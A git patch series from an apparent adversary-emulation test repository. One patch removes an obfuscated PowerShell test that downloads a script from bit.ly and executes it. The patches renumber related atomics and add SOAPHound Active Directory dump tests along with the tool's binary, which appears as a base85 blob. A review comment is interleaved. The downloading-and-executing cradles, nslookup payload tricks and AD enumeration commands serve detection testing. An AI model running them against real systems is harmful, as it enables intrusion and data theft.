PowerShell Invoke Known Malicious Cmdlets [windows] - - Atomic Test #20: PowerUp Invoke-AllChecks [windows] - - Atomic Test #21: Abuse Nslookup with DNS Records [windows] + - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows] + - Atomic Test #5: Invoke-AppPathBypass [windows] + - Atomic Test #6: Powershell MsXml COM object - with prompt [windows] + - Atomic Test #7: Powershell XML requests [windows] + - Atomic Test #8: Powershell invoke mshta.exe download [windows] + - Atomic Test #9: Powershell Invoke-DownloadCradle [windows] + - Atomic Test #10: PowerShell Fileless Script Execution [windows] + - Atomic Test #11: NTFS Alternate Data Stream 
Access [windows] + - Atomic Test #12: PowerShell Session Creation and Use [windows] + - Atomic Test #13: ATHPowerShellCommandLineParameter -Command parameter variations [windows] + - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] + - Atomic Test #15: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] + - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #17: PowerShell Command Execution [windows] + - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] + - Atomic Test #19: PowerUp Invoke-AllChecks [windows] + - Atomic Test #20: Abuse Nslookup with DNS Records [windows] - [T1053.006 Scheduled Task/Job: Systemd Timers](../../T1053.006/T1053.006.md) - Atomic Test #1: Create Systemd Service and Timer [linux] - Atomic Test #2: Create a user level transient systemd service and timer [linux] diff --git a/atomics/Indexes/Indexes-Markdown/windows-index.md b/atomics/Indexes/Indexes-Markdown/windows-index.md index 7567634661..c95b224d4a 100644 --- a/atomics/Indexes/Indexes-Markdown/windows-index.md +++ b/atomics/Indexes/Indexes-Markdown/windows-index.md 
@@ -857,24 +857,23 @@ - Atomic Test #1: Mimikatz [windows] - Atomic Test #2: Run BloodHound from local disk [windows] - Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows] - - Atomic Test #4: Obfuscation Tests [windows] - - Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows] - - Atomic Test #6: Invoke-AppPathBypass [windows] - - Atomic Test #7: Powershell MsXml COM object - with prompt [windows] - - Atomic Test #8: Powershell XML requests [windows] - - Atomic Test #9: Powershell invoke mshta.exe download [windows] - - Atomic Test #10: Powershell Invoke-DownloadCradle [windows] - - Atomic Test #11: PowerShell Fileless Script Execution [windows] - - Atomic Test #12: NTFS Alternate Data Stream Access [windows] - - Atomic Test #13: PowerShell Session Creation and Use [windows] - - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations [windows] - - Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] - - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] - - Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] - - Atomic Test #18: PowerShell Command Execution [windows] - - Atomic Test #19: PowerShell Invoke Known Malicious Cmdlets [windows] - - Atomic Test #20: PowerUp Invoke-AllChecks [windows] - - Atomic Test #21: Abuse Nslookup with DNS Records [windows] + - Atomic Test #4: Mimikatz - Cradlecraft PsSendKeys [windows] + - Atomic Test #5: Invoke-AppPathBypass [windows] + - Atomic Test #6: Powershell MsXml COM object - with prompt [windows] + - Atomic Test #7: Powershell XML requests [windows] + - Atomic Test #8: Powershell invoke mshta.exe download [windows] + - Atomic Test #9: Powershell Invoke-DownloadCradle [windows] + - Atomic Test #10: PowerShell Fileless Script Execution [windows] + - Atomic Test #11: NTFS Alternate Data Stream 
Access [windows] + - Atomic Test #12: PowerShell Session Creation and Use [windows] + - Atomic Test #13: ATHPowerShellCommandLineParameter -Command parameter variations [windows] + - Atomic Test #14: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows] + - Atomic Test #15: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows] + - Atomic Test #16: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows] + - Atomic Test #17: PowerShell Command Execution [windows] + - Atomic Test #18: PowerShell Invoke Known Malicious Cmdlets [windows] + - Atomic Test #19: PowerUp Invoke-AllChecks [windows] + - Atomic Test #20: Abuse Nslookup with DNS Records [windows] - [T1559 Inter-Process Communication](../../T1559/T1559.md) - Atomic Test #1: Cobalt Strike Artifact Kit pipe [windows] - Atomic Test #2: Cobalt Strike Lateral Movement (psexec_psh) pipe [windows] diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index f770d1e53d..29c7a31ce4 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml 
@@ -50754,21 +50754,6 @@ execution: ' name: powershell - - name: Obfuscation Tests - auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - description: 'Different obfuscated methods to test. Upon execution, reaches - out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM - REMOTE LOCATION" - - ' - supported_platforms: - - windows - executor: - command: | - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() - Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) - name: powershell - name: Mimikatz - Cradlecraft PsSendKeys auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d description: 'Run mimikatz via PsSendKeys. Upon execution, automated actions diff --git a/atomics/Indexes/windows-index.yaml b/atomics/Indexes/windows-index.yaml index 1aa5cd79a6..28a032034a 100644 --- a/atomics/Indexes/windows-index.yaml +++ b/atomics/Indexes/windows-index.yaml 
@@ -41909,21 +41909,6 @@ execution: ' name: powershell - - name: Obfuscation Tests - auto_generated_guid: 4297c41a-8168-4138-972d-01f3ee92c804 - description: 'Different obfuscated methods to test. Upon execution, reaches - out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM - REMOTE LOCATION" - - ' - supported_platforms: - - windows - executor: - command: | - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) - (New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() - Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) - name: powershell - name: Mimikatz - Cradlecraft PsSendKeys auto_generated_guid: af1800cf-9f9d-4fd1-a709-14b1e6de020d description: 'Run mimikatz via PsSendKeys. Upon execution, automated actions diff --git a/atomics/T1059.001/T1059.001.md b/atomics/T1059.001/T1059.001.md index 59addb05dc..dc18799341 100644 --- a/atomics/T1059.001/T1059.001.md +++ b/atomics/T1059.001/T1059.001.md 
@@ -16,41 +16,39 @@ PowerShell commands/scripts can also be executed without directly invoking the < - [Atomic Test #3 - Run Bloodhound from Memory using Download Cradle](#atomic-test-3---run-bloodhound-from-memory-using-download-cradle) -- [Atomic Test #4 - Obfuscation Tests](#atomic-test-4---obfuscation-tests) +- [Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-4---mimikatz---cradlecraft-pssendkeys) -- [Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys](#atomic-test-5---mimikatz---cradlecraft-pssendkeys) +- [Atomic Test #5 - Invoke-AppPathBypass](#atomic-test-5---invoke-apppathbypass) -- [Atomic Test #6 - Invoke-AppPathBypass](#atomic-test-6---invoke-apppathbypass) +- [Atomic Test #6 - Powershell MsXml COM object - with prompt](#atomic-test-6---powershell-msxml-com-object---with-prompt) -- [Atomic Test #7 - Powershell MsXml COM object - with prompt](#atomic-test-7---powershell-msxml-com-object---with-prompt) +- [Atomic Test #7 - Powershell XML requests](#atomic-test-7---powershell-xml-requests) -- [Atomic Test #8 - Powershell XML requests](#atomic-test-8---powershell-xml-requests) +- [Atomic Test #8 - Powershell invoke mshta.exe download](#atomic-test-8---powershell-invoke-mshtaexe-download) -- [Atomic Test #9 - Powershell invoke mshta.exe download](#atomic-test-9---powershell-invoke-mshtaexe-download) +- [Atomic Test #9 - Powershell Invoke-DownloadCradle](#atomic-test-9---powershell-invoke-downloadcradle) -- [Atomic Test #10 - Powershell Invoke-DownloadCradle](#atomic-test-10---powershell-invoke-downloadcradle) +- [Atomic Test #10 - PowerShell Fileless Script Execution](#atomic-test-10---powershell-fileless-script-execution) -- [Atomic Test #11 - PowerShell Fileless Script Execution](#atomic-test-11---powershell-fileless-script-execution) +- [Atomic Test #11 - NTFS Alternate Data Stream Access](#atomic-test-11---ntfs-alternate-data-stream-access) -- [Atomic Test #12 - NTFS Alternate Data Stream 
Access](#atomic-test-12---ntfs-alternate-data-stream-access) +- [Atomic Test #12 - PowerShell Session Creation and Use](#atomic-test-12---powershell-session-creation-and-use) -- [Atomic Test #13 - PowerShell Session Creation and Use](#atomic-test-13---powershell-session-creation-and-use) +- [Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-13---athpowershellcommandlineparameter--command-parameter-variations) -- [Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations](#atomic-test-14---athpowershellcommandlineparameter--command-parameter-variations) +- [Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-14---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments) -- [Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments](#atomic-test-15---athpowershellcommandlineparameter--command-parameter-variations-with-encoded-arguments) +- [Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-15---athpowershellcommandlineparameter--encodedcommand-parameter-variations) -- [Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations](#atomic-test-16---athpowershellcommandlineparameter--encodedcommand-parameter-variations) +- [Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-16---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) -- [Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments](#atomic-test-17---athpowershellcommandlineparameter--encodedcommand-parameter-variations-with-encoded-arguments) +- [Atomic Test #17 - PowerShell Command Execution](#atomic-test-17---powershell-command-execution) -- [Atomic 
Test #18 - PowerShell Command Execution](#atomic-test-18---powershell-command-execution) +- [Atomic Test #18 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-18---powershell-invoke-known-malicious-cmdlets) -- [Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets](#atomic-test-19---powershell-invoke-known-malicious-cmdlets) +- [Atomic Test #19 - PowerUp Invoke-AllChecks](#atomic-test-19---powerup-invoke-allchecks) -- [Atomic Test #20 - PowerUp Invoke-AllChecks](#atomic-test-20---powerup-invoke-allchecks) - -- [Atomic Test #21 - Abuse Nslookup with DNS Records](#atomic-test-21---abuse-nslookup-with-dns-records) +- [Atomic Test #20 - Abuse Nslookup with DNS Records](#atomic-test-20---abuse-nslookup-with-dns-records)
@@ -175,37 +173,7 @@ Remove-Item $env:Temp\*BloodHound.zip -Force

-## Atomic Test #4 - Obfuscation Tests -Different obfuscated methods to test. Upon execution, reaches out to bit.ly/L3g1t and displays: "SUCCESSFULLY EXECUTED POWERSHELL CODE FROM REMOTE LOCATION" - -**Supported Platforms:** Windows - - -**auto_generated_guid:** 4297c41a-8168-4138-972d-01f3ee92c804 - - - - - - -#### Attack Commands: Run with `powershell`! - - -```powershell -(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))) -(New-Object Net.WebClient).DownloadFile('http://bit.ly/L3g1tCrad1e','Default_File_Path.ps1');[ScriptBlock]::Create((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_}))).InvokeReturnAsIs() -Set-Variable HJ1 'http://bit.ly/L3g1tCrad1e';SI Variable:/0W 'Net.WebClient';Set-Item Variable:\gH 'Default_File_Path.ps1';ls _-*;Set-Variable igZ (.$ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand.PsObject.Methods|?{$_.Name-like'*Cm*t'}).Name).Invoke($ExecutionContext.InvokeCommand.(($ExecutionContext.InvokeCommand|GM|?{$_.Name-like'*om*e'}).Name).Invoke('*w-*ct',$TRUE,1))(Get-ChildItem Variable:0W).Value);Set-Variable J ((((Get-Variable igZ -ValueOn)|GM)|?{$_.Name-like'*w*i*le'}).Name);(Get-Variable igZ -ValueOn).((ChildItem Variable:J).Value).Invoke((Get-Item Variable:/HJ1).Value,(GV gH).Value);&( ''.IsNormalized.ToString()[13,15,48]-Join'')(-Join([Char[]](CAT -Enco 3 (GV gH).Value))) -``` - - - - - - -
-
- -## Atomic Test #5 - Mimikatz - Cradlecraft PsSendKeys +## Atomic Test #4 - Mimikatz - Cradlecraft PsSendKeys Run mimikatz via PsSendKeys. Upon execution, automated actions will take place to open file explorer, open notepad and input code, then mimikatz dump info will be displayed. **Supported Platforms:** Windows @@ -233,7 +201,7 @@ $url='https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/f650520c4b10

-## Atomic Test #6 - Invoke-AppPathBypass +## Atomic Test #5 - Invoke-AppPathBypass Note: Windows 10 only. Upon execution windows backup and restore window will be opened. Bypass is based on: https://enigma0x3.net/2017/03/14/bypassing-uac-using-app-paths/ @@ -263,7 +231,7 @@ Powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githu

-## Atomic Test #7 - Powershell MsXml COM object - with prompt +## Atomic Test #6 - Powershell MsXml COM object - with prompt Powershell MsXml COM object. Not proxy aware, removing cache although does not appear to write to those locations. Upon execution, "Download Cradle test success!" will be displayed. Provided by https://github.com/mgreen27/mgreen27.github.io @@ -298,7 +266,7 @@ powershell.exe -exec bypass -noprofile "$comMsXml=New-Object -ComObject MsXml2.S

-## Atomic Test #8 - Powershell XML requests +## Atomic Test #7 - Powershell XML requests Powershell xml download request. Upon execution, "Download Cradle test success!" will be dispalyed. Provided by https://github.com/mgreen27/mgreen27.github.io @@ -333,7 +301,7 @@ Provided by https://github.com/mgreen27/mgreen27.github.io

-## Atomic Test #9 - Powershell invoke mshta.exe download +## Atomic Test #8 - Powershell invoke mshta.exe download Powershell invoke mshta to download payload. Upon execution, a new PowerShell window will be opened which will display "Download Cradle test success!". Provided by https://github.com/mgreen27/mgreen27.github.io @@ -368,7 +336,7 @@ C:\Windows\system32\cmd.exe /c "mshta.exe javascript:a=GetObject('script:#{url}'

-## Atomic Test #10 - Powershell Invoke-DownloadCradle +## Atomic Test #9 - Powershell Invoke-DownloadCradle Provided by https://github.com/mgreen27/mgreen27.github.io Invoke-DownloadCradle is used to generate Network and Endpoint artifacts. @@ -394,7 +362,7 @@ Invoke-DownloadCradle is used to generate Network and Endpoint artifacts.

-## Atomic Test #11 - PowerShell Fileless Script Execution +## Atomic Test #10 - PowerShell Fileless Script Execution Execution of a PowerShell payload from the Windows Registry similar to that seen in fileless malware infections. Upon exection, open "C:\Windows\Temp" and verify that art-marker.txt is in the folder. @@ -430,7 +398,7 @@ Remove-Item HKCU:\Software\Classes\AtomicRedTeam -Force -ErrorAction Ignore

-## Atomic Test #12 - NTFS Alternate Data Stream Access +## Atomic Test #11 - NTFS Alternate Data Stream Access Creates a file with an alternate data stream and simulates executing that hidden code/file. Upon execution, "Stream Data Executed" will be displayed. **Supported Platforms:** Windows @@ -481,7 +449,7 @@ Write-Host Prereq's for this test cannot be met automatically

-## Atomic Test #13 - PowerShell Session Creation and Use +## Atomic Test #12 - PowerShell Session Creation and Use Connect to a remote powershell session and interact with the host. Upon execution, network test info and 'T1086 PowerShell Session Creation and Use' will be displayed. @@ -537,7 +505,7 @@ Enable-PSRemoting

-## Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations +## Atomic Test #13 - ATHPowerShellCommandLineParameter -Command parameter variations Executes powershell.exe with variations of the -Command parameter **Supported Platforms:** Windows @@ -585,7 +553,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #15 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments +## Atomic Test #14 - ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments Executes powershell.exe with variations of the -Command parameter with encoded arguments supplied **Supported Platforms:** Windows @@ -634,7 +602,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations +## Atomic Test #15 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations Executes powershell.exe with variations of the -EncodedCommand parameter **Supported Platforms:** Windows @@ -682,7 +650,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #17 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments +## Atomic Test #16 - ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments Executes powershell.exe with variations of the -EncodedCommand parameter with encoded arguments supplied **Supported Platforms:** Windows @@ -731,7 +699,7 @@ Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force

-## Atomic Test #18 - PowerShell Command Execution +## Atomic Test #17 - PowerShell Command Execution Use of obfuscated PowerShell to execute an arbitrary command; outputs "Hello, from PowerShell!". Example is from the 2021 Threat Detection Report by Red Canary. **Supported Platforms:** Windows @@ -764,7 +732,7 @@ powershell.exe -e #{obfuscated_code}

-## Atomic Test #19 - PowerShell Invoke Known Malicious Cmdlets +## Atomic Test #18 - PowerShell Invoke Known Malicious Cmdlets Powershell execution of known Malicious PowerShell Cmdlets **Supported Platforms:** Windows @@ -801,7 +769,7 @@ foreach ($cmdlets in $malcmdlets) {

-## Atomic Test #20 - PowerUp Invoke-AllChecks +## Atomic Test #19 - PowerUp Invoke-AllChecks Check for privilege escalation paths using PowerUp from PowerShellMafia **Supported Platforms:** Windows @@ -831,7 +799,7 @@ Invoke-AllChecks

-## Atomic Test #21 - Abuse Nslookup with DNS Records +## Atomic Test #20 - Abuse Nslookup with DNS Records Red teamer's avoid IEX and Invoke-WebRequest in your PowerShell commands. Instead, host a text record with a payload to compromise hosts. [reference](https://twitter.com/jstrosch/status/1237382986557001729) From 8f71cf4d53567b0a46dbb97b78ca59c38c8f6288 Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Thu, 22 Feb 2024 10:36:17 -0700 Subject: [PATCH 03/41] SOAPHound (#2689) * SOAPHound * Updates --------- Co-authored-by: Carrie Roberts --- atomics/T1059.001/T1059.001.yaml | 75 ++++++++++++++++++++++++++++ atomics/T1059.001/bin/SOAPHound.exe | Bin 0 -> 573952 bytes 2 files changed, 75 insertions(+) create mode 100644 atomics/T1059.001/bin/SOAPHound.exe diff --git a/atomics/T1059.001/T1059.001.yaml b/atomics/T1059.001/T1059.001.yaml index 89ee87a182..a91f37080e 100644 --- a/atomics/T1059.001/T1059.001.yaml +++ b/atomics/T1059.001/T1059.001.yaml 
@@ -405,3 +405,78 @@ atomic_tests:
 function nslookup { &"$env:windir\system32\nslookup.exe" @args | Out-Null; @("","whoami")}
 powershell .(nslookup -q=txt example.com 8.8.8.8)[-1]
 name: powershell
+- name: SOAPHound - Dump BloodHound Data
+ description: |
+ Dump BloodHound data using SOAPHound. Upon execution, BloodHound data will be dumped and stored in the specified output directory.
+ src: https://github.com/FalconForceTeam/SOAPHound
+ supported_platforms:
+ - windows
+ input_arguments:
+ user:
+ description: Username for authentication
+ type: string
+ default: $env:USERNAME
+ password:
+ description: Password for authentication
+ type: string
+ default: P@ssword1
+ domain:
+ description: Domain for authentication
+ type: string
+ default: $env:USERDOMAIN
+ dc:
+ description: Domain Controller IP
+ type: string
+ default: 10.0.1.14
+ cachefilename:
+ description: Cache filename
+ type: string
+ default: c:\temp\cache.txt
+ outputdirectory:
+ description: Output directory
+ type: string
+ default: c:\temp\test2
+ soaphound_path:
+ description: Path to SOAPHound binary
+ type: string
+ default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe
+ executor:
+ command: |
+ #{soaphound_path} --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename #{cachefilename} --outputdirectory #{outputdirectory}
+ name: powershell
+- name: SOAPHound - Build Cache
+ description: |
+ Build cache using SOAPHound. Upon execution, a cache will be built and stored in the specified cache filename.
+ src: https://github.com/FalconForceTeam/SOAPHound
+ supported_platforms:
+ - windows
+ input_arguments:
+ user:
+ description: Username for authentication
+ type: string
+ default: $env:USERNAME
+ password:
+ description: Password for authentication
+ type: string
+ default: P@ssword1
+ domain:
+ description: Domain for authentication
+ type: string
+ default: $env:USERDOMAIN
+ dc:
+ description: Domain Controller IP
+ type: string
+ default: 10.0.1.14
+ cachefilename:
+ description: Cache filename
+ type: string
+ default: c:\temp\cache.txt
+ soaphound_path:
+ description: Path to SOAPHound binary
+ type: string
+ default: PathToAtomicsFolder\T1059.001\bin\SOAPHound.exe
+ executor:
+ command: |
+ #{soaphound_path} --user $(#{user})@$(#{domain}) --password #{password} --dc #{dc} --buildcache --cachefilename #{cachefilename}
+ name: powershell
+
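Review bot: Neither new test defines a `cleanup_command`, although both write directory enumeration output to disk (`c:\temp\cache.txt`, plus `c:\temp\test2` for the dump test), so the collected AD data stays on the test host after the run; other atomics in this file remove their artifacts. Both executors also call `#{soaphound_path}` unquoted, which fails when the atomics folder path contains a space. `--password #{password}` places whatever credential is supplied into process-creation and script-block logs, so the description should tell operators to use a disposable test account. The dump test appears to rely on a cache file that only the second test builds, so the ordering or a prerequisite check is worth confirming. The fence shows the executor for the first test; the second needs the same quoting and a cleanup for its cache file.

```yaml
# … unchanged: name, description, supported_platforms, input_arguments …
  executor:
    command: |
      & "#{soaphound_path}" --user #{user} --password #{password} --domain #{domain} --dc #{dc} --bhdump --cachefilename "#{cachefilename}" --outputdirectory "#{outputdirectory}"
    cleanup_command: |
      Remove-Item "#{cachefilename}" -Force -ErrorAction Ignore
      Remove-Item "#{outputdirectory}" -Recurse -Force -ErrorAction Ignore
    name: powershell
```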
diff --git a/atomics/T1059.001/bin/SOAPHound.exe b/atomics/T1059.001/bin/SOAPHound.exe new file mode 100644 index 0000000000000000000000000000000000000000..7c84163f21c9ea5cd33cfa9751da3891efc6fa77 GIT binary patch literal 573952 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 